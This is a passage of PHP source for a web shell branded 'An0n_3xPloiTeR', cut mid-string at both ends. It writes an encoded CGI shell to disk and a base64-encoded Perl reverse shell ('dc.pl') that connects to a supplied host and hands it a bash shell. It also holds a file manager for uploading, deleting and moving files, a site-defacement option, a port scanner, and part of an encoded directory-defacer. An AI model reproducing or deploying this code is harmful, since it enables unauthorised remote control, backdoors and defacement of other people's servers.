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';
966 $file = @fopen("izo.cin", "w+");
967 $write = @fwrite($file, htmlspecialchars_decode(gzinflate(base64_decode($cgishellizocin))));
968 @fclose($file);
969 @chmod("izo.cin", 0755);
970 $netcatshell = 'IyEvdXNyL2Jpbi9wZXJsCnVzZSBJTzo6U29ja2V0OwokU2hlbGwJPSAiL2Jpbi9iYXNoIjsKJEFSR0M9QEFSR1Y7CnVzZSBTb2NrZXQ7CnVzZSBGaWxlSGFuZGxlOwpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgZ2V0cHJvdG9ieW5hbWUoInRjcCIpKSBvciBkaWUgcHJpbnQgIlstXSBVbmFibGUgdG8gUmVzb2x2ZSBIb3N0XG4iOwpjb25uZWN0KFNPQ0tFVCwgc29ja2FkZHJfaW4oJEFSR1ZbMV0sIGluZXRfYXRvbigkQVJHVlswXSkpKSBvciBkaWUgcHJpbnQgIlstXSBVbmFibGUgdG8gQ29ubmVjdCBIb3N0XG4iOwpwcmludCAiQ29ubmVjdGVkISI7ClNPQ0tFVC0+YXV0b2ZsdXNoKCk7Cm9wZW4oU1RESU4sICI+JlNPQ0tFVCIpOwpvcGVuKFNURE9VVCwiPiZTT0NLRVQiKTsKb3BlbihTVERFUlIsIj4mU09DS0VUIik7CnByaW50ICJcdFx0XHRcdC0tPT0gQmFja2Rvb3IgQ29ubmVjdGVkID09LS0gIFxuXG5cdFx0XHRcdC0tPT0gQnkgQW4wbiAzeFBsb2lUZVIgPT0tLVxuXG4iOwpzeXN0ZW0oInVuc2V0IEhJU1RGSUxFOyB1bnNldCBTQVZFSElTVCA7ZWNobyAnWytdIFN5c3RlbWluZm86ICc7IHVuYW1lIC1hO2VjaG87ZWNobyAnWytdIFVzZXJpbmZvOiAnOyBpZDtlY2hvO2VjaG8gJ1srXSBEaXJlY3Rvcnk6ICc7IHB3ZDtlY2hvOyBlY2hvICdbK10gU2hlbGw6ICc7JFNoZWxsIik7CmNsb3NlIFNPQ0tFVDs=';
971 $file = fopen("dc.pl", "w+");
972 $write = fwrite($file, base64_decode($netcatshell));
973 fclose($file);
974 @chmod("dc.pl", 0755);
975 echo "<iframe src='izo.cin' width=100% height=300% frameborder=0></iframe> ";
976 echo '</div>';
977 printFooter();
978}
979
980
981function actioncleanshell()
982{
983
984 $self= $_SERVER["PHP_SELF"]; // Where am i
985 header("location:$self?mini_shell");
986}
987function actioncpcrack()
988{
989
990 $self= $_SERVER["PHP_SELF"]; // Where am i
991 header("location:$self?cp");
992}
993
994function actionFilesMan() {
995 printHeader();
996 echo '<h1>File manager</h1><div class=content>';
997 if(isset($_POST['p1']) && $_POST['p1']!='deface') {
998 switch($_POST['p1']) {
999 case 'uploadFile':
1000 if(!@move_uploaded_file($_FILES['f']['tmp_name'], $_FILES['f']['name']))
1001 echo "Can't upload file!";
1002 break;
1003 break;
1004 case 'mkdir':
1005 if(!@mkdir($_POST['p2']))
1006 echo "Can't create new dir";
1007 break;
1008 case 'delete':
1009 function deleteDir($path) {
1010 $path = (substr($path,-1)=='/') ? $path:$path.'/';
1011 $dh = opendir($path);
1012 while ( ($item = readdir($dh) ) !== false) {
1013 $item = $path.$item;
1014 if ( (basename($item) == "..") || (basename($item) == ".") )
1015 continue;
1016 $type = filetype($item);
1017 if ($type == "dir")
1018 deleteDir($item);
1019 else
1020 @unlink($item);
1021 }
1022 closedir($dh);
1023 rmdir($path);
1024 }
1025 if(is_array(@$_POST['f']))
1026 foreach($_POST['f'] as $f) {
1027 $f = urldecode($f);
1028 if(is_dir($f))
1029 deleteDir($f);
1030 else
1031 @unlink($f);
1032 }
1033 break;
1034
1035
1036
1037
1038 case 'paste':
1039 if($_SESSION['act'] == 'copy') {
1040 function copy_paste($c,$s,$d){
1041 if(is_dir($c.$s)){
1042 mkdir($d.$s);
1043 $h = opendir($c.$s);
1044 while (($f = readdir($h)) !== false)
1045 if (($f != ".") and ($f != "..")) {
1046 copy_paste($c.$s.'/',$f, $d.$s.'/');
1047 }
1048 } elseif(is_file($c.$s)) {
1049 @copy($c.$s, $d.$s);
1050 }
1051 }
1052 foreach($_SESSION['f'] as $f)
1053 copy_paste($_SESSION['cwd'],$f, $GLOBALS['cwd']);
1054 } elseif($_SESSION['act'] == 'move') {
1055 function move_paste($c,$s,$d){
1056 if(is_dir($c.$s)){
1057 mkdir($d.$s);
1058 $h = opendir($c.$s);
1059 while (($f = readdir($h)) !== false)
1060 if (($f != ".") and ($f != "..")) {
1061 copy_paste($c.$s.'/',$f, $d.$s.'/');
1062 }
1063 } elseif(is_file($c.$s)) {
1064 @copy($c.$s, $d.$s);
1065 }
1066 }
1067 foreach($_SESSION['f'] as $f)
1068 @rename($_SESSION['cwd'].$f, $GLOBALS['cwd'].$f);
1069 }
1070 unset($_SESSION['f']);
1071 break;
1072 default:
1073 if(!empty($_POST['p1']) && (($_POST['p1'] == 'copy')||($_POST['p1'] == 'move')) ) {
1074 $_SESSION['act'] = @$_POST['p1'];
1075 $_SESSION['f'] = @$_POST['f'];
1076 foreach($_SESSION['f'] as $k => $f)
1077 $_SESSION['f'][$k] = urldecode($f);
1078 $_SESSION['cwd'] = @$_POST['c'];
1079 }
1080 break;
1081 }
1082 echo '<script>document.mf.p1.value="";document.mf.p2.value="";</script>';
1083 }
1084
1085 $dirContent = @scandir(isset($_POST['c'])?$_POST['c']:$GLOBALS['cwd']);
1086 if($dirContent === false) { echo 'Can\'t open this folder!'; return; }
1087 global $sort;
1088 $sort = array('name', 1);
1089 if(!empty($_POST['p1'])) {
1090 if(preg_match('!s_([A-z]+)_(\d{1})!', $_POST['p1'], $match))
1091 $sort = array($match[1], (int)$match[2]);
1092 }
1093 echo '<script>
1094 function sa() {
1095 for(i=0;i<document.files.elements.length;i++)
1096 if(document.files.elements[i].type == \'checkbox\')
1097 document.files.elements[i].checked = document.files.elements[0].checked;
1098 }
1099 </script>
1100 <table width=\'100%\' class=\'main\' cellspacing=\'0\' cellpadding=\'2\'>
1101 <form name=files method=post>';
1102 echo "<tr><th width='13px'><input type=checkbox onclick='sa()' class=chkbx></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_name_".($sort[1]?0:1)."\")'>Name</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_size_".($sort[1]?0:1)."\")'>Size</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_modify_".($sort[1]?0:1)."\")'>Modify</a></th><th>Owner/Group</th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_perms_".($sort[1]?0:1)."\")'>Permissions</a></th><th>Actions</th></tr>";
1103 $dirs = $files = $links = array();
1104 $n = count($dirContent);
1105 for($i=0;$i<$n;$i++) {
1106 $ow = @posix_getpwuid(@fileowner($dirContent[$i]));
1107 $gr = @posix_getgrgid(@filegroup($dirContent[$i]));
1108 $tmp = array('name' => $dirContent[$i],
1109 'path' => $GLOBALS['cwd'].$dirContent[$i],
1110 'modify' => @date('Y-m-d H:i:s',@filemtime($GLOBALS['cwd'].$dirContent[$i])),
1111 'perms' => viewPermsColor($GLOBALS['cwd'].$dirContent[$i]),
1112 'size' => @filesize($GLOBALS['cwd'].$dirContent[$i]),
1113 'owner' => $ow['name']?$ow['name']:@fileowner($dirContent[$i]),
1114 'group' => $gr['name']?$gr['name']:@filegroup($dirContent[$i])
1115 );
1116 if(@is_file($GLOBALS['cwd'].$dirContent[$i]))
1117 $files[] = array_merge($tmp, array('type' => 'file'));
1118 elseif(@is_link($GLOBALS['cwd'].$dirContent[$i]))
1119 $links[] = array_merge($tmp, array('type' => 'link'));
1120 elseif(@is_dir($GLOBALS['cwd'].$dirContent[$i])&& ($dirContent[$i] != "."))
1121 $dirs[] = array_merge($tmp, array('type' => 'dir'));
1122 }
1123 $GLOBALS['sort'] = $sort;
1124 function cmp($a, $b) {
1125 if($GLOBALS['sort'][0] != 'size')
1126 return strcmp($a[$GLOBALS['sort'][0]], $b[$GLOBALS['sort'][0]])*($GLOBALS['sort'][1]?1:-1);
1127 else
1128 return (($a['size'] < $b['size']) ? -1 : 1)*($GLOBALS['sort'][1]?1:-1);
1129 }
1130 usort($files, "cmp");
1131 usort($dirs, "cmp");
1132 usort($links, "cmp");
1133 $files = array_merge($dirs, $links, $files);
1134 $l = 0;
1135 foreach($files as $f) {
1136 echo '<tr'.($l?' class=l1':'').'><td><input type=checkbox name="f[]" value="'.urlencode($f['name']).'" class=chkbx></td><td><a href=# onclick="'.(($f['type']=='file')?'g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'view\')">'.htmlspecialchars($f['name']):'g(\'FilesMan\',\''.$f['path'].'\');"><b>[ '.htmlspecialchars($f['name']).' ]</b>').'</a></td><td>'.(($f['type']=='file')?viewSize($f['size']):$f['type']).'</td><td>'.$f['modify'].'</td><td>'.$f['owner'].'/'.$f['group'].'</td><td><a href=# onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\',\'chmod\')">'.$f['perms']
1137 .'</td><td><a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'rename\')">R</a> <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'touch\')">T</a>'.(($f['type']=='file')?' <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'edit\')">E</a> <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'download\')">D</a>':'').'</td></tr>';
1138 $l = $l?0:1;
1139 }
1140 echo '<tr><td colspan=5>
1141 <input type=hidden name=a value=\'FilesMan\'>
1142 <input type=hidden name=c value="'.htmlspecialchars($GLOBALS['cwd']).'">
1143 <input type=hidden name=charset value="'.(isset($_POST['charset'])?$_POST['charset']:'').'">
1144 <select name=\'p1\'><option value=\'copy\'>Copy</option><option value=\'move\'>Move</option><option value=\'delete\'>Delete</option>';
1145 if(!empty($_SESSION['act'])&&@count($_SESSION['f'])){echo '<option value=\'paste\'>Paste</option>'; }
1146 echo '</select> <input type="submit" value=">>"></td><td colspan="2" align="right" width="1"><input name="def" id="def" value="An0n_3xPloiTeR.html" size="10"/> <input type="button" onclick="g(\'FilesMan\',\''.htmlspecialchars($GLOBALS['cwd']).'\',\'deface\',document.getElementById(\'def\').value)" value="Submit"></td></tr>
1147 </form></table></div>';
1148 printFooter();
1149}
1150
1151
1152function actionPortScanner() {
1153 printHeader();
1154 echo '<center><h1>Port Scanner</h1></center>';
1155 echo '<div class="content">';
1156 echo '<form action="" method="post">';
1157
1158 if(isset($_POST['host']) && is_numeric($_POST['end']) && is_numeric($_POST['start'])){
1159 $start = strip_tags($_POST['start']);
1160 $end = strip_tags($_POST['end']);
1161 $host = strip_tags($_POST['host']);
1162 for($i = $start; $i<=$end; $i++){
1163 $fp = @fsockopen($host, $i, $errno, $errstr, 3);
1164 if($fp){
1165 echo 'Port '.$i.' is <font color=aqua>open</font><br>';
1166 }
1167 flush();
1168 }
1169 } else {
1170 echo '<br /><br /><center><input type="hidden" name="a" value="PortScanner"><input type="hidden" name=p1><input type="hidden" name="p2">
1171 <input type="hidden" name="c" value="'.htmlspecialchars($GLOBALS['cwd']).'">
1172 <input type="hidden" name="charset" value="'.(isset($_POST['charset'])?$_POST['charset']:'').'">
1173 Host: <input type="text" name="host" value="localhost"/><br /><br />
1174 Port start: <input type="text" name="start" value="0"/><br /><br />
1175 Port end:<input type="text" name="end" value="5000"/><br /><br />
1176 <input type="submit" value="Scan Ports" />
1177 </form></center><br /><br />';
1178 }
1179 echo '</div>';
1180 printFooter();
1181}
1182
1183
1184function actionDirDefacer() {
1185 printHeader();
1186 $dirdeface = "3RlrbyLJ8bMj5T90FGfHVmYA395uVljogrH3bAUby+DdXG4t1MwUTB8z03M9jYGL/N9T/ZgXxuBTVqfTIS/0o6q6Hl2vXvImkqd/OR/0Rj/cXpBQxtGbmTz985/Ucjk70FOggZ3quWQyArVwTbOMnMOU+kC6UUTOmQBfcsEgIx7pJq2EvF3dRpyN4E4hNgvMnFQMkhI/pCID2Xnz84LL0/vRR++DGZLmM9iExmABA8h8wVLJeGLBfZ5ISHJCl9SfQ0DO1pucvIJ2xH369QiHUqYe/Lxgj5aCgKmALNxK/eRDq2VGio62kueRj1yQO4PFkhm5pTNU+VSCIG/ft1rkCimIRxplhE+JZDEQz9sl35KLOdL56nqjE76Q/wdVYj9baS9kyMVW4nWSLrmPqSBdMQVIyDCk4esPmcMadRNkO2Rwz9auOtAtD3xJOPfXa1DAI8uY9Kgy7p4LsucO02S2wHuylQgkL5LIAZ0ZJCBo5BiijkCPSGbOTgzOZxHkCAYf48FOnCmPIr50aVQcFGfJhMtfiUQjWNF9aCmds0zSpOSQN9IIw5ea7sI0ymJJACu3PNuqsKJzowBk4/Wx4N/efdfr8ThF9U6i7da6uvAgKCxZIxqxZE4ERBZyeDm4G/XuR+SqN7ix8CGGG7utTm83m6zB4tlCNHweN69Wb6Pwc9z4KZ295lY9MlimXGx38iULZNgJ8Ar74OmJS1jCJKORl/loos7J7jOcDKjwQwLJjCWQOaXpusCWzO0qK+N3NArhM0xwJOknZVK3O+jfgJyiidDpflmCyNweTWhAXZOVLpl0LxaCDwHm7sXKZxLcwSMIuRDgfs/xT1nOveTyjEuMp1N+Tefuv2jCeYDr/bXPM/ea+hh+YaiQb3SCoGXWW7s3qJcQREL6bBZKd6hlucIBi9MIzNRFtrNrnsk+Gg6DCU5HPHU/h1R6957mDkVxf6Ah52qzJ+gyAuEqjrIK79fo2RG6uNvnfD7EeCfdCbqn27u5GFlhnntDJtdl/j2Y8GBN/muGGMBmgi+SwPN5xEWb/LX1ofXupGUgh727Qb9/1r3zPnZ7F15v0B/cKRD9OSUbMJdX31/28d9oH+Dwsns++LwP6qw7fHakBrGcLkPUh1l50t9c1wRWsi1QBxJWGGAjNkvaBH0fA63dmOJt85agrNcmEx4FlhmzMaUxi9aIshAZe8yJTTBdgPAimCocDCbz+oaw1J7vaGu0Ceqdl9SeGcIgEiNaBhHetT+kaCxJF1qyP5RslWup2KcC6A7r/d4FMXxk7BdE+9D6W9XpGoHuA8YpxqW6gAKC071S7LatOfFtq3ak7iiqEU0vVJoVNVcxrjIN2CPxI2xbih6iYLqsuXPi6ugX2pwtdaw6PMfImcHjqgS/S8MUFQlCcDEWoNIohuyj1jFCgB9yYnlAUKODvAOYchET6quw1vligOwPwdwZ8iBfTTGxfCkl+WKrPMWBPuAwYEJ0Dse3g+HoRycY49R5ULuHurYhHWL3DJ5psMy4DpZJLYGqnY4cA+C49tf8uAb2eBONpRkaIITsqAIwXSRaOpLRySIZx6hxGh0pbt1DLAzolGEOPsTCeGxYOjZOxKZHLBsvBZMUSycNf2y3DtSEqiN9muDQbJrrg+oEzORHBoRmWi2THFFj+